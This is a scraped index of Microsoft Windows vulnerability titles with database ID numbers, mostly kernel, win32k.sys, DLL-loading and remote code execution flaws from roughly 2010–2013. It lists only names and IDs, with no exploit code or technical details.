Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) [90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution [83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling 